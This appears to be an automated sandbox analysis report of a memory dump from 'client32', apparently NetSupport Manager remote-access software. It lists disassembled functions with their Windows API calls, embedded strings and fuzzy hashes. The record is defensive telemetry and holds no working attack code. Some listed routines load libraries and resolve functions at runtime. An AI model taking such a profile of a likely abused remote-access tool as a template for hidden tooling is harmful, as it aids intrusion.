Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2

Function 1103F720 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
DestroyCursor.USER32(00000000), ref: 1103F7A1
SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
UpdateWindow.USER32(00000000), ref: 1103F7F2

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

Strings

m_hWnd, xrefs: 1103F7E1
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3726914545-2830328467
Opcode ID: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
Opcode Fuzzy Hash: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756

Function 1115F620 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1115F62F
_memset.LIBCMT ref: 1115F64B
GetMenuItemID.USER32(?,00000000), ref: 1115F65C

Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2

CheckMenuItem.USER32(?,00000000,00000000), ref: 1115F698
EnableMenuItem.USER32(?,00000000,00000000), ref: 1115F6AE
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1115F6C4

Strings

0, xrefs: 1115F655

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
String ID: 0
API String ID: 176136580-4108050209
Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772

Function 110812A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1108132F
_memset.LIBCMT ref: 11081318

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

IsA(), xrefs: 110812BE, 11081373
pData, xrefs: 110812FC
m_iPos>=nBytes, xrefs: 1108134B
..\CTL32\DataStream.cpp, xrefs: 110812B9, 110812D9, 110812F7, 11081346, 1108136E
nBytes>=0, xrefs: 110812DE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
API String ID: 75970324-4264523126
Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1

Function 11031D20 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Kernel32.dll,B6DE5DE1,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 11031D52
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11180418,000000FF,?,11031E2B), ref: 11031D90
GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 11031D9E
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11180418,000000FF,?,11031E2B), ref: 11031DB6
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11180418,000000FF,?,11031E2B), ref: 11031DC4

Strings

Kernel32.dll, xrefs: 11031D4A
ProcessIdToSessionId, xrefs: 11031D96

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCurrentErrorFreeLastLoadProcProcess
String ID: Kernel32.dll$ProcessIdToSessionId
API String ID: 1613046405-2825297712
Opcode ID: e3af48cd2796cadb44d890bc48003dee36657bf80fdaadc13518694a7f3ac9f9
Instruction ID: 30d33ffa46bb4aa4acb344cb0fac7ce1acfcd4ae2f6fc5bbf3baf071416afc9a
Opcode Fuzzy Hash: e3af48cd2796cadb44d890bc48003dee36657bf80fdaadc13518694a7f3ac9f9
Instruction Fuzzy Hash: 3321B0B1D61228AFCB10DFD9D988A9EFFB8FB49A15F10462BF421E3644D7B419008F90

Function 11017A40 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 67libraryloaderCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,B6DE5DE1,11030346,00000000), ref: 11017A6E
LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
SetLastError.KERNEL32(00000078), ref: 11017ADD
FreeLibrary.KERNEL32(00000000), ref: 11017AE8

Strings

Kernel32.dll, xrefs: 11017A74
QueueUserWorkItem, xrefs: 11017AB9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateErrorEventFreeLastLoadProc
String ID: Kernel32.dll$QueueUserWorkItem
API String ID: 4285663087-4150702566
Opcode ID: 3e91b062b7345433f88135f4591795957f231578769475b4b7857bd3e6af7e82
Instruction ID: 8896b3f3378cccc65e9bab94f377e18e2855128faf3beda00f5a87bac3949b10
Opcode Fuzzy Hash: 3e91b062b7345433f88135f4591795957f231578769475b4b7857bd3e6af7e82
Instruction Fuzzy Hash: 0121D3B1D52638ABDB10CFDAD984ADEFFB8EB49B10F10451BF421E7644C7B445008B91

Function 11091A50 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA

CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 11091A9D
UpdateWindow.USER32(?), ref: 11091AEF

Strings

m_hWnd || !"FindClass Window failed to create", xrefs: 11091AB4
m_hWnd, xrefs: 11091ADE
NSMClassList, xrefs: 11091A97
findclass.cpp, xrefs: 11091AAF
E:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11091AD9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryWindow$AddressCreateDefaultFreeLangLoadProcSystemUpdateVersion_memset
String ID: E:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$NSMClassList$findclass.cpp$m_hWnd$m_hWnd || !"FindClass Window failed to create"
API String ID: 2732523160-3743713504
Opcode ID: 6979a2629d2e15e2fed3a04f27e70c91e85ae02578112d644cab4eff092ab379
Instruction ID: 71e5ad4f5f89e15b98e5c915c38ae35aa55c630867603c4352b0429e0c116282
Opcode Fuzzy Hash: 6979a2629d2e15e2fed3a04f27e70c91e85ae02578112d644cab4eff092ab379
Instruction Fuzzy Hash: A801F539B40326B7E310DA56EC52F9BF7D89B40B68F108435FA19A7280E774E800C695

Function 1103F450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 1103F466
FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
IsWindow.USER32(00000000), ref: 1103F484
Sleep.KERNEL32(00000014), ref: 1103F497
FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
IsWindow.USER32(00000000), ref: 1103F4AF

Strings

PCIVideoSlave32, xrefs: 1103F477, 1103F49F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Find$Sleep
String ID: PCIVideoSlave32
API String ID: 2137649973-2496367574
Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777

Function 11003400 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFF), ref: 1100340E
GetSubMenu.USER32(00000000,00000000), ref: 1100343A
GetSubMenu.USER32(00000000,00000000), ref: 1100345C
DestroyMenu.USER32(00000000), ref: 1100346A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 1100341F, 11003447
hMenu, xrefs: 11003424
hSub, xrefs: 1100344C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9

Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
GetSubMenu.USER32(00000000,00000000), ref: 11003343
GetMenuItemCount.USER32(00000000), ref: 11003367
DestroyMenu.USER32(00000000), ref: 11003379

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 1100332E, 11003354
hMenu, xrefs: 11003333
hSub, xrefs: 11003359

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 4241058051-934300333
Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9

Function 110EFB70 Relevance: 12.1, APIs: 8, Instructions: 129fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000080,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 110EFBB3

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ddebb3266c5ba79a07f6b8d470fa1eddbd939e1a1b388148c9d70ce23a4d5093
Instruction ID: 7053a98a95f1787013b19c965889698e9493aed849bd5a4167a5a7c1904df78c
Opcode Fuzzy Hash: ddebb3266c5ba79a07f6b8d470fa1eddbd939e1a1b388148c9d70ce23a4d5093
Instruction Fuzzy Hash: 2241F772E012199FD724CFA8C985BAEF7F8EF84319F10456EE556DB680DB70A900C791

Function 11025712 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowTextA.USER32(?,?,00000050), ref: 11025766
_strncat.LIBCMT ref: 1102577B
SetWindowTextA.USER32(?,?), ref: 11025788

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025814
GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025828
SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
SetFocus.USER32(?), ref: 11025855

Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
